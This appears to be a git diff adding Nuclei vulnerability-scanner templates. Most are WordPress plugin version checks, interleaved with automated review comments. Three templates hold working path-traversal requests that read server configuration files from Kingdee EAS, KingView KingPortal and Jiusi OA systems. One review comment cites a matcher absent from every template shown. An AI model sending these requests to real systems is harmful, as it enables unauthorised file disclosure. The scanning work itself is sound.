+++ b/poc/other/jiusi-oa-dl-fileread.yaml
@@ -0,0 +1,19 @@
+id: jiusi-oa-dl-fileread
+
+info:
+ name: jiusi-oa-dl-fileread
+ author: PokerSec
+ severity: critical
+ metadata:
+ fofasearch: body="/jsoa/login.jsp"
+
+http:
+ - raw:
+ - |
+ POST /jsoa/dl.jsp?JkZpbGVOYW1lPS4uLy4uLy4uL1dFQi1JTkYvd2ViLnhtbCZwYXRoPS9h HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - status_code==200 && contains_all(body,"web-resource-collection") && contains_all(body,"com.js.oa.")
\ No newline at end of file
diff --git a/poc/other/jquery-manager.yaml b/poc/other/jquery-manager.yaml
new file mode 100644
index 0000000000..d954dba992
--- /dev/null
+++ b/poc/other/jquery-manager.yaml
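Review bot: The `info` block has no `description`, `reference` or `tags`, and the search hint is keyed `fofasearch` where the other templates in this commit use `fofa-query`. Without a reference, nothing in the template says which advisory or fixed version it corresponds to, so a finding cannot be mapped to a remediation. The matcher also fires only when the body contains `jdbc.password`, so every positive result presumably carries database credentials in the recorded response, and output from this template should be stored and shared as secret material. The jiusi-oa-dl-fileread, kingdee_eas_pdfViewLocal_fileread and kingview-KingPortal-img-fileread templates have the same bare `info` block.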
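Review bot: In jiusi-oa-dl-fileread, `severity: critical` is out of line with the three sibling file-read templates by the same author in this commit (jinher, kingdee, kingview), which are all `high`. Nothing in the template explains the difference, so either align it with the others or add a `description` stating why this one rates higher. The request is a `POST` with no body and an opaque encoded query string; a one-line YAML comment above the request stating what the parameter encodes would let a reviewer check the request against the matcher.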
@@ -0,0 +1,59 @@ +id: jquery-manager-3367ea01f2088951cb342fb251d528dc + +info: + name: > + jQuery Manager for WordPress <= 1.10.4 - Running Vulnerable Dependency + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/21a27a8b-f599-42b9-9439-4456995dd3fe?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/jquery-manager/" + google-query: inurl:"/wp-content/plugins/jquery-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,jquery-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/jquery-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "jquery-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.10.4') \ No newline at end of file diff --git a/poc/other/kingdee_eas_pdfViewLocal_fileread.yaml b/poc/other/kingdee_eas_pdfViewLocal_fileread.yaml new file mode 100644 index 0000000000..028875a89e --- /dev/null +++ b/poc/other/kingdee_eas_pdfViewLocal_fileread.yaml @@ -0,0 +1,19 @@ +id: kingdee_eas_pdfViewLocal_fileread + +info: + name: kingdee_eas_pdfViewLocal_fileread + author: PokerSec + severity: high + metadata: + fofasearch: header="Apusic Application" + +http: + - raw: + - | + GET /easweb/logout/../cp/dm/pdfViewLocal.jsp?path=../config/bosconfig.xml HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body,"xml","cacheLazyLoad") \ No newline at end of file 
diff --git a/poc/other/kingview-KingPortal-img-fileread.yaml b/poc/other/kingview-KingPortal-img-fileread.yaml
new file mode 100644
index 0000000000..303ab1cb6f
--- /dev/null
+++ b/poc/other/kingview-KingPortal-img-fileread.yaml
@@ -0,0 +1,19 @@
+id: kingview-KingPortal-img-fileread
+
+info:
+ name: kingview-KingPortal-img-fileread
+ author: PokerSec
+ severity: high
+ metadata:
+ fofasearch: body="/public/javascripts/Common/Util/km_util.js"
+
+http:
+ - raw:
+ - |
+ GET /kingclient/img?imgPath=..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - status_code==200 && contains_all(body,"[extensions]") && contains_all(body,"[files]")
\ No newline at end of file
diff --git a/poc/other/koalendar-free-booking-widget-ce4441524b592e785043e6070388f53a.yaml b/poc/other/koalendar-free-booking-widget-ce4441524b592e785043e6070388f53a.yaml
new file mode 100644
index 0000000000..ed560a523c
--- /dev/null
+++ b/poc/other/koalendar-free-booking-widget-ce4441524b592e785043e6070388f53a.yaml
@@ -0,0 +1,59 @@ +id: koalendar-free-booking-widget-ce4441524b592e785043e6070388f53a + +info: + name: > + Koalendar – Events & Appointments Booking Calendar <= 1.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via height Parameter + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cbbbf5fe-0369-4de6-9b2f-957286b6f394?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/koalendar-free-booking-widget/" + google-query: inurl:"/wp-content/plugins/koalendar-free-booking-widget/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,koalendar-free-booking-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/koalendar-free-booking-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "koalendar-free-booking-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/poc/other/kredeum-nfts-63e1fa011074b96657eb8fc01827c46b.yaml b/poc/other/kredeum-nfts-63e1fa011074b96657eb8fc01827c46b.yaml new file mode 100644 index 0000000000..0c284091fc --- /dev/null +++ b/poc/other/kredeum-nfts-63e1fa011074b96657eb8fc01827c46b.yaml 
@@ -0,0 +1,59 @@ +id: kredeum-nfts-63e1fa011074b96657eb8fc01827c46b + +info: + name: > + Kredeum NFTs, the easiest way to sell your NFTs directly on your WordPress site <= 1.6.9 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3eb74ac2-ac5d-477b-8142-3e42953f859b?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/kredeum-nfts/" + google-query: inurl:"/wp-content/plugins/kredeum-nfts/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,kredeum-nfts,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kredeum-nfts/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kredeum-nfts" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6.9') \ No newline at end of file diff --git a/poc/other/logs-de-connexion.yaml b/poc/other/logs-de-connexion.yaml new file mode 100644 index 0000000000..b0e71d6350 --- /dev/null +++ b/poc/other/logs-de-connexion.yaml 
@@ -0,0 +1,59 @@ +id: logs-de-connexion-d7d23b155dfaa3a988d72e6127ed152e + +info: + name: > + Connexion Logs <= 3.0.2 - Cross-Site Request Forgery to Log Deletion + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ef0abec6-7d4b-4a1f-8116-e31d60bc34b0?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/logs-de-connexion/" + google-query: inurl:"/wp-content/plugins/logs-de-connexion/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,logs-de-connexion,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/logs-de-connexion/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "logs-de-connexion" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.2') \ No newline at end of file diff --git a/poc/other/newsmanapp.yaml b/poc/other/newsmanapp.yaml new file mode 100644 index 0000000000..db5921cee1 --- /dev/null +++ b/poc/other/newsmanapp.yaml 
@@ -0,0 +1,59 @@
+id: newsmanapp-2cdae8c089e4c36f52b2db17fb262dfa
+
+info:
+ name: >
+ NewsmanApp <= 2.7.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/22a02e75-4ab1-48fb-b618-b1dff2fcd97f?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/newsmanapp/"
+ google-query: inurl:"/wp-content/plugins/newsmanapp/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,newsmanapp,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/newsmanapp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "newsmanapp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.7.6')
\ No newline at end of file
diff --git a/poc/other/newspack-plugin.yaml b/poc/other/newspack-plugin.yaml
new file mode 100644
index 0000000000..1dff3e2501
--- /dev/null
+++ b/poc/other/newspack-plugin.yaml
@@ -0,0 +1,59 @@
+id: newspack-plugin-9379b5458873ca8a838af45b061cf132
+
+info:
+ name: >
+ Newspack <= 3.8.6 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f68e6fed-1986-4172-8270-0460450d6a02?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/newspack-plugin/"
+ google-query: inurl:"/wp-content/plugins/newspack-plugin/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,newspack-plugin,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/newspack-plugin/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "newspack-plugin"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.8.6')
\ No newline at end of file
diff --git a/poc/other/notibar.yaml b/poc/other/notibar.yaml
new file mode 100644
index 0000000000..8331534d31
--- /dev/null
+++ b/poc/other/notibar.yaml
@@ -0,0 +1,59 @@
+id: notibar-6a67eeac174695863f49cd0d3c96e4de
+
+info:
+ name: >
+ Notibar – Notification Bar for WordPress <= 2.1.4 - Authenticated (Subscriber+) Arbitrary Shortcode Execution via njt_nofi_text
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1766727d-ba54-4b46-b362-415c14be027d?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/notibar/"
+ google-query: inurl:"/wp-content/plugins/notibar/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,notibar,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/notibar/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "notibar"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.4')
\ No newline at end of file
diff --git a/poc/other/ootb-openstreetmap.yaml b/poc/other/ootb-openstreetmap.yaml
new file mode 100644
index 0000000000..22436f4a00
--- /dev/null
+++ b/poc/other/ootb-openstreetmap.yaml
@@ -0,0 +1,59 @@
+id: ootb-openstreetmap-ebbdd7982d7cfbc5d8fdcc7fb1338a5e
+
+info:
+ name: >
+ Out of the Block: OpenStreetMap <= 2.8.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via ootb_query Shortcode
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c67c958e-1ab2-498c-b665-73e239d0029b?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/ootb-openstreetmap/"
+ google-query: inurl:"/wp-content/plugins/ootb-openstreetmap/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,ootb-openstreetmap,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ootb-openstreetmap/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ootb-openstreetmap"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.8.3')
\ No newline at end of file
diff --git a/poc/other/planning-center-online-giving.yaml b/poc/other/planning-center-online-giving.yaml
new file mode 100644
index 0000000000..fdb576d9a7
--- /dev/null
+++ b/poc/other/planning-center-online-giving.yaml
@@ -0,0 +1,59 @@
+id: planning-center-online-giving-2b8dc9f317fc89f600c6ff394da3f60b
+
+info:
+ name: >
+ Planning Center Online Giving <= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/bb991940-b4ed-4b64-be59-afe37eaf3a2c?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/planning-center-online-giving/"
+ google-query: inurl:"/wp-content/plugins/planning-center-online-giving/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,planning-center-online-giving,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/planning-center-online-giving/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "planning-center-online-giving"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.0')
\ No newline at end of file
diff --git a/poc/other/plezi-4a635b36fc2f020e6e97470ee9033e55.yaml b/poc/other/plezi-4a635b36fc2f020e6e97470ee9033e55.yaml
new file mode 100644
index 0000000000..988efc2ac4
--- /dev/null
+++ b/poc/other/plezi-4a635b36fc2f020e6e97470ee9033e55.yaml
@@ -0,0 +1,59 @@
+id: plezi-4a635b36fc2f020e6e97470ee9033e55
+
+info:
+ name: >
+ Plezi <= 1.0.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/67768957-45be-48d9-ad5e-147290ef4cd5?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/plezi/"
+ google-query: inurl:"/wp-content/plugins/plezi/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,plezi,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/plezi/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "plezi"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.6')
\ No newline at end of file
diff --git a/poc/other/post-to-pdf-8ab47ff832f5f5cf5ba543f690973fee.yaml b/poc/other/post-to-pdf-8ab47ff832f5f5cf5ba543f690973fee.yaml
new file mode 100644
index 0000000000..c8dd849d4e
--- /dev/null
+++ b/poc/other/post-to-pdf-8ab47ff832f5f5cf5ba543f690973fee.yaml
@@ -0,0 +1,59 @@
+id: post-to-pdf-8ab47ff832f5f5cf5ba543f690973fee
+
+info:
+ name: >
+ Post to Pdf <= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2774e66c-2920-4578-9ab8-20d7dfd6bd6d?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/post-to-pdf/"
+ google-query: inurl:"/wp-content/plugins/post-to-pdf/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,post-to-pdf,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/post-to-pdf/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "post-to-pdf"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0')
\ No newline at end of file
diff --git a/poc/other/post-types-carousel-slider-c7b7350193feff134087fae14530c8a3.yaml b/poc/other/post-types-carousel-slider-c7b7350193feff134087fae14530c8a3.yaml
new file mode 100644
index 0000000000..675f8fc993
--- /dev/null
+++ b/poc/other/post-types-carousel-slider-c7b7350193feff134087fae14530c8a3.yaml
@@ -0,0 +1,59 @@
+id: post-types-carousel-slider-c7b7350193feff134087fae14530c8a3
+
+info:
+ name: >
+ Post Carousel & Slider <= 1.0.4 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4cc038af-c4c8-4141-bbe3-81bcf0a2bace?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/post-types-carousel-slider/"
+ google-query: inurl:"/wp-content/plugins/post-types-carousel-slider/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,post-types-carousel-slider,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/post-types-carousel-slider/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "post-types-carousel-slider"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.4')
\ No newline at end of file
diff --git a/poc/other/posts-and-products-views-6353d59c8166d0c7835a56c9603f6772.yaml b/poc/other/posts-and-products-views-6353d59c8166d0c7835a56c9603f6772.yaml
new file mode 100644
index 0000000000..bb4d621469
--- /dev/null
+++ b/poc/other/posts-and-products-views-6353d59c8166d0c7835a56c9603f6772.yaml
@@ -0,0 +1,59 @@
+id: posts-and-products-views-6353d59c8166d0c7835a56c9603f6772
+
+info:
+ name: >
+ Posts and Products Views for WooCommerce <= 2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a7e27a6c-8b14-459b-aba2-044f311edf9e?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/posts-and-products-views/"
+ google-query: inurl:"/wp-content/plugins/posts-and-products-views/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,posts-and-products-views,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/posts-and-products-views/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "posts-and-products-views"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1')
\ No newline at end of file
diff --git a/poc/other/primer-mydata.yaml b/poc/other/primer-mydata.yaml
new file mode 100644
index 0000000000..ccc04d6d28
--- /dev/null
+++ b/poc/other/primer-mydata.yaml
@@ -0,0 +1,59 @@
+id: primer-mydata-375188c0b0a50f100d36b48b3521edda
+
+info:
+ name: >
+ Primer MyData for Woocommerce <= 4.2.1 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/aca092cf-9482-468e-8dd4-af04e25bcf33?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/primer-mydata/"
+ google-query: inurl:"/wp-content/plugins/primer-mydata/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,primer-mydata,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/primer-mydata/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "primer-mydata"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.2.1')
\ No newline at end of file
diff --git a/poc/other/products-stock-manager-with-excel.yaml b/poc/other/products-stock-manager-with-excel.yaml
new file mode 100644
index 0000000000..a9a16086d0
--- /dev/null
+++ b/poc/other/products-stock-manager-with-excel.yaml
@@ -0,0 +1,59 @@
+id: products-stock-manager-with-excel-ca4c619b208bcba2a3262a03cfacdba5
+
+info:
+ name: >
+ PHPSpreadsheet Library < 2.3.0 - XXE Injection
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/38f950b7-e3a0-4e05-a8b0-9cc6b6c66b0c?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/products-stock-manager-with-excel/"
+ google-query: inurl:"/wp-content/plugins/products-stock-manager-with-excel/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,products-stock-manager-with-excel,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/products-stock-manager-with-excel/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "products-stock-manager-with-excel"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.8')
\ No newline at end of file
diff --git a/poc/other/property-hive-stamp-duty-calculator.yaml b/poc/other/property-hive-stamp-duty-calculator.yaml
new file mode 100644
index 0000000000..c9cf55ce6d
--- /dev/null
+++ b/poc/other/property-hive-stamp-duty-calculator.yaml
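Review bot: The title names `PHPSpreadsheet Library < 2.3.0`, but the `dsl` matcher compares the `products-stock-manager-with-excel` readme version against `<= 1.8`, so a reader of the finding cannot tell which component or version was actually checked. The `name` should include the plugin that is probed, and a comment above the matcher should record the mapping, e.g. `# 1.8: plugin release presumed to bundle PHPSpreadsheet < 2.3.0 - confirm against the advisory`. Nothing in the template inspects the bundled library itself, so the result is only as accurate as that mapping.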
@@ -0,0 +1,59 @@
+id: property-hive-stamp-duty-calculator-16a9af1f4a5d2ccf56de55248353c80f
+
+info:
+ name: >
+ Property Hive Stamp Duty Calculator <= 1.0.22 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f4f52cb6-eccf-4213-ae44-4a3fa738723d?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/property-hive-stamp-duty-calculator/"
+ google-query: inurl:"/wp-content/plugins/property-hive-stamp-duty-calculator/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,property-hive-stamp-duty-calculator,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/property-hive-stamp-duty-calculator/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "property-hive-stamp-duty-calculator"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.22')
\ No newline at end of file
diff --git a/poc/other/revy.yaml b/poc/other/revy.yaml
new file mode 100644
index 0000000000..1eb832c66b
--- /dev/null
+++ b/poc/other/revy.yaml
@@ -0,0 +1,59 @@
+id: revy-97d9157afa2e36b24297da5e222a765b
+
+info:
+ name: >
+ Revy <= 1.18 - Unauthenticated Arbitrary File Upload
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6827dc47-669c-41de-8716-7932ce8e5259?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
